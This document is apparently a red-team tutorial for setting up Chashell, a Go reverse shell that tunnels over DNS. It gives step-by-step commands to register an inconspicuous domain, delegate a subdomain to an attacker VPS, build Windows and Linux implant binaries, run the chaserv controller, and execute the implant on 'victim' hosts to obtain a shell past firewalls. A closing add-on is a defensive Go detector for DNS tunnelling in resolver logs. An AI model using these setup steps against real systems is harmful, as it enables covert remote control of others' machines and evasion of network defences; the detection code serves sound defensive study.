Introduction
“Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks. It comes with a multi-client control server, named chaserv.” - https://github.com/sysdream/chashell
Domain name setup
Purchase a domain name of your choice (ideally something cheap that does not look suspicious to your target), then set up your DNS records as follows (replace 444.111.222.333 with your VPS IP):
Type  Name      Value                     TTL
A     chashell  444.111.222.333           5 min
NS    c         chashell.yourdomain.xyz.  5 min
The A record points the chashell host name at your VPS, and the NS record delegates the c subdomain to that host, so every DNS query for a name under c.yourdomain.xyz is sent to your VPS, where chaserv answers it on port 53.
Chashell installation and setup (Debian VPS)
The installation steps below are executed on a VPS (running Debian). Adapt as required for your environment.
Before commencing, ensure your system is updated and the build tools are present by running:
sudo apt update
sudo apt dist-upgrade
sudo apt install git make tmux gcc
Download golang, set the golang path and install the chashell build dependencies
Note: We are using an older version of golang as newer versions have dependency issues with packages such as dep and gox. Navigate to https://go.dev/dl/ to view the direct link for newer golang versions if desired.
Download and install golang and set the path:
wget https://go.dev/dl/go1.15.15.linux-amd64.tar.gz
rm -rf /usr/local/go && tar -C /usr/local -xzf go1.15.15.linux-amd64.tar.gz
Edit your .profile file (in your home directory), then add the following to the end:
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
Save and then run:
source .profile
go version # to ensure go is functional
Install chashell go dependencies with:
go get -u github.com/golang/dep/cmd/dep
go get github.com/mitchellh/gox
Install chashell, configure variables and build binaries
Run the following commands to clone the chashell repo, configure the variables (the encryption key and the domain details from above) and build the chashell binaries for each target platform:
cd go/src
git clone https://github.com/sysdream/chashell
cd chashell
export ENCRYPTION_KEY=$(hexdump -vn6 -e'4/4 "%08X" 1 "\n"' /dev/urandom)
export DOMAIN_NAME=c.yourdomain.xyz
make build-all OSARCH="windows/amd64" && make build-all OSARCH="windows/386" && make build-all OSARCH="linux/amd64"
Download the binaries to your local system
Run the following scp command on your local machine to download the binaries from your VPS (replace user with your VPS OS username and 444.111.222.333 with your VPS IP):
scp user@444.111.222.333:/user/go/src/chashell/release/* ./
Stop systemd-resolved then start chaserv (to free up port 53)
SSH back into your VPS, then run the following commands to stop systemd-resolved (it listens on port 53, which chashell requires for its DNS functionality) and start the chashell server inside a tmux session:
sudo systemctl stop systemd-resolved
tmux
cd go/src/chashell/release/
./chaserv_linux_amd64
We are now ready to test the chashell binaries on our victim hosts.
Testing against victim host
Windows
Copy chashell_windows_amd64.exe to your victim Windows machine, then execute it to trigger the shell (as shown below):
Back on your VPS, observe that the chashell server receives the shell request:
This concludes the basic setup and use of chashell. For more information refer to the official GitHub repo at https://github.com/sysdream/chashell or feel free to contact us if you have any questions.
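Because the NS delegation above sends every query under c.yourdomain.xyz to the VPS, the shell shows up in a network's resolver logs as a stream of long, never-repeating names under one delegated zone from a single client. The following Go program is an added example (not part of this post or of chashell) that flags that pattern; the log line format and the sample lines are constructed for the example.

```go
package main

import (
	"fmt"
	"strings"
)

// Constructed resolver log lines ("time client qname"), not real chashell output.
// The last four carry long encoded labels under the delegated zone c.yourdomain.xyz.
var sampleLog = []string{
	"12:00:01 10.0.0.5 www.example.com.",
	"12:00:02 10.0.0.7 cdn.static.example.com.",
	"12:00:03 10.0.0.5 0123456789abcdef0123456789abcdef.c.yourdomain.xyz.",
	"12:00:03 10.0.0.5 123456789abcdef0123456789abcdef0.c.yourdomain.xyz.",
	"12:00:04 10.0.0.5 23456789abcdef0123456789abcdef01.c.yourdomain.xyz.",
	"12:00:04 10.0.0.5 3456789abcdef0123456789abcdef012.c.yourdomain.xyz.",
}

// TunnelSuspects groups unique query names by "client zone" (zone = the last
// zoneLabels labels) and reports pairs with at least minQueries names whose
// leading labels average at least minLen characters: many long, never-repeated
// names under one delegated zone. Tune both thresholds to your resolver's baseline.
func TunnelSuspects(lines []string, zoneLabels, minLen, minQueries int) map[string]int {
	count, datalen, seen := map[string]int{}, map[string]int{}, map[string]bool{}
	for _, line := range lines {
		f := strings.Fields(line)
		if len(f) < 3 || seen[f[1]+" "+f[2]] {
			continue
		}
		seen[f[1]+" "+f[2]] = true
		labels := strings.Split(strings.TrimSuffix(f[2], "."), ".")
		if len(labels) <= zoneLabels {
			continue
		}
		key := f[1] + " " + strings.Join(labels[len(labels)-zoneLabels:], ".")
		count[key]++
		datalen[key] += len(strings.Join(labels[:len(labels)-zoneLabels], ""))
	}
	out := map[string]int{}
	for key, n := range count {
		if n >= minQueries && datalen[key]/n >= minLen {
			out[key] = n
		}
	}
	return out
}

func main() {
	fmt.Println(TunnelSuspects(sampleLog, 3, 30, 3))
}
```

On the sample data only the pair "10.0.0.5 c.yourdomain.xyz" is reported (4 names); the one CDN-style query under static.example.com stays below both thresholds.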